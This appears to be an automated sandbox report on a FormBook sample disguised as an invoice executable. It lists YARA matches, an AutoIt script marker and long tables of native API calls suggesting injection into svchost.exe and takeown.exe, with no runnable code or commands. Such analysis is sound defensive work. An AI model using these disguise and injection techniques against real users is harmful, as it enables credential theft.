Code function: 1_2_007BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_007BCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1487507905.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3727463287.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1493104684.00000000079B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3725513198.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722004871.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1489001963.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3722928185.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725327628.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00733B3A
Source: Invoice Remittance ref20250226.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Invoice Remittance ref20250226.exe, 00000001.00000000.1264149410.00000000007E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a0c33535-1
Source: Invoice Remittance ref20250226.exe, 00000001.00000000.1264149410.00000000007E4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_bf2a2a7b-b
Source: Invoice Remittance ref20250226.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_89f23707-0
Source: Invoice Remittance ref20250226.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_591dae40-a

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice Remittance ref20250226.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042C253 NtClose,	6_2_0042C253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472B60 NtClose,LdrInitializeThunk,	6_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034735C0 NtCreateMutant,LdrInitializeThunk,	6_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03474340 NtSetContextThread,	6_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03474650 NtSuspendThread,	6_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472BE0 NtQueryValueKey,	6_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472BF0 NtAllocateVirtualMemory,	6_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472B80 NtQueryInformationFile,	6_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472BA0 NtEnumerateValueKey,	6_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472AD0 NtReadFile,	6_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472AF0 NtWriteFile,	6_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472AB0 NtWaitForSingleObject,	6_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472F60 NtCreateProcessEx,	6_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472F30 NtCreateSection,	6_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472FE0 NtCreateFile,	6_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472F90 NtProtectVirtualMemory,	6_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472FA0 NtQuerySection,	6_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472FB0 NtResumeThread,	6_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472E30 NtWriteVirtualMemory,	6_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472EE0 NtQueueApcThread,	6_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472E80 NtReadVirtualMemory,	6_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472EA0 NtAdjustPrivilegesToken,	6_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472D00 NtSetInformationFile,	6_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472D10 NtMapViewOfSection,	6_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472D30 NtUnmapViewOfSection,	6_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472DD0 NtDelayExecution,	6_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472DB0 NtEnumerateKey,	6_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472C60 NtCreateKey,	6_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472C70 NtFreeVirtualMemory,	6_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472C00 NtQueryInformationProcess,	6_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472CC0 NtQueryVirtualMemory,	6_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472CF0 NtOpenProcess,	6_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03472CA0 NtQueryInformationToken,	6_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03473010 NtOpenDirectoryObject,	6_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03473090 NtSetValueKey,	6_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034739B0 NtGetContextThread,	6_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03473D70 NtOpenThread,	6_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03473D10 NtOpenProcessToken,	6_2_03473D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03554340 NtSetContextThread,LdrInitializeThunk,	10_2_03554340
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03554650 NtSuspendThread,LdrInitializeThunk,	10_2_03554650
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552B60 NtClose,LdrInitializeThunk,	10_2_03552B60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_03552BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_03552BE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_03552BA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552AD0 NtReadFile,LdrInitializeThunk,	10_2_03552AD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552AF0 NtWriteFile,LdrInitializeThunk,	10_2_03552AF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552F30 NtCreateSection,LdrInitializeThunk,	10_2_03552F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552FE0 NtCreateFile,LdrInitializeThunk,	10_2_03552FE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552FB0 NtResumeThread,LdrInitializeThunk,	10_2_03552FB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_03552EE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_03552E80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_03552D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_03552D30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552DD0 NtDelayExecution,LdrInitializeThunk,	10_2_03552DD0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03552DF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03552C70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552C60 NtCreateKey,LdrInitializeThunk,	10_2_03552C60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_03552CA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035535C0 NtCreateMutant,LdrInitializeThunk,	10_2_035535C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035539B0 NtGetContextThread,LdrInitializeThunk,	10_2_035539B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552B80 NtQueryInformationFile,	10_2_03552B80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552AB0 NtWaitForSingleObject,	10_2_03552AB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552F60 NtCreateProcessEx,	10_2_03552F60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552F90 NtProtectVirtualMemory,	10_2_03552F90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552FA0 NtQuerySection,	10_2_03552FA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552E30 NtWriteVirtualMemory,	10_2_03552E30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552EA0 NtAdjustPrivilegesToken,	10_2_03552EA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552D00 NtSetInformationFile,	10_2_03552D00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552DB0 NtEnumerateKey,	10_2_03552DB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552C00 NtQueryInformationProcess,	10_2_03552C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552CC0 NtQueryVirtualMemory,	10_2_03552CC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03552CF0 NtOpenProcess,	10_2_03552CF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03553010 NtOpenDirectoryObject,	10_2_03553010
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03553090 NtSetValueKey,	10_2_03553090
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03553D70 NtOpenThread,	10_2_03553D70
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03553D10 NtOpenProcessToken,	10_2_03553D10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B38F60 NtCreateFile,	10_2_02B38F60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B39260 NtClose,	10_2_02B39260
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B393C0 NtAllocateVirtualMemory,	10_2_02B393C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B390D0 NtReadFile,	10_2_02B390D0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B391C0 NtDeleteFile,	10_2_02B391C0

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0079A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

1_2_0079A1EF

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00788310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00788310

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_007951BD

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0073E6A0	1_2_0073E6A0
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075D975	1_2_0075D975
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0073FCE0	1_2_0073FCE0
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007521C5	1_2_007521C5
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007662D2	1_2_007662D2
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007B03DA	1_2_007B03DA
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0076242E	1_2_0076242E
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007525FA	1_2_007525FA
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0078E616	1_2_0078E616
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007466E1	1_2_007466E1
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0076878F	1_2_0076878F
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007B0857	1_2_007B0857
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00766844	1_2_00766844
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00748808	1_2_00748808
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00798889	1_2_00798889
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075CB21	1_2_0075CB21
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00766DB6	1_2_00766DB6
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00746F9E	1_2_00746F9E
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00743030	1_2_00743030
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075F1D9	1_2_0075F1D9
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00753187	1_2_00753187
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00731287	1_2_00731287
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00751484	1_2_00751484
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00745520	1_2_00745520
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00757696	1_2_00757696
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00745760	1_2_00745760
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00751978	1_2_00751978
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00769AB5	1_2_00769AB5
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007B7DDB	1_2_007B7DDB
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0075BDA6	1_2_0075BDA6
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00751D90	1_2_00751D90
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0073DF00	1_2_0073DF00
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00743FE0	1_2_00743FE0
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_018D3610	1_2_018D3610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00418133	6_2_00418133
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040286F	6_2_0040286F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402870	6_2_00402870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040F8F3	6_2_0040F8F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042E8B3	6_2_0042E8B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004011D0	6_2_004011D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041634F	6_2_0041634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00416353	6_2_00416353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040DB03	6_2_0040DB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040FB13	6_2_0040FB13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00404394	6_2_00404394
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040DC47	6_2_0040DC47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040DC53	6_2_0040DC53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402550	6_2_00402550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402D70	6_2_00402D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00417E77	6_2_00417E77
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FA352	6_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E3F0	6_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_035003E6	6_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C02C0	6_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034C8158	6_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430100	6_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DA118	6_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F81CC	6_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F41A2	6_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_035001AA	6_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D2000	6_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03464750	6_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440770	6_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343C7C0	6_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345C6E0	6_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440535	6_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03500591	6_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F2446	6_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E4420	6_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EE4F6	6_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FAB40	6_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F6BD7	6_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343EA80	6_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03456962	6_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034429A0	6_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0350A9A6	6_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344A840	6_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03442840	6_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346E8F0	6_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034268B8	6_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B4F40	6_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03482F28	6_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03460F30	6_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E2F30	6_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03432FC8	6_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344CFE0	6_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034BEFA0	6_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440E59	6_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FEE26	6_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FEEDB	6_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03452E90	6_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FCE93	6_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344AD00	6_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DCD1F	6_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343ADE0	6_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03458DBF	6_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03440C00	6_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03430CF2	6_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0CB5	6_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342D34C	6_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F132D	6_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0348739A	6_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345B2C0	6_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E12ED	6_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034452A0	6_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0347516C	6_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342F172	6_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0350B16B	6_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344B1B0	6_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EF0CC	6_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034470C0	6_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F70E9	6_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FF0E0	6_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FF7B0	6_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03485630	6_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F16CC	6_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F7571	6_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_035095C3	6_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DD5B0	6_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03431460	6_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FF43F	6_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FFB76	6_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B5BF0	6_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0347DBF9	6_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345FB80	6_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FFA49	6_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F7A46	6_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B3A6C	6_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EDAC6	6_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DDAAC	6_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03485AA0	6_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E1AA3	6_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03449950	6_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345B950	6_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D5910	6_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034AD800	6_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034438E0	6_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FFF09	6_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03403FD2	6_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03403FD5	6_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03441F92	6_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FFFB1	6_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03449EB0	6_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03443D40	6_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F1D5A	6_2_034F1D5A
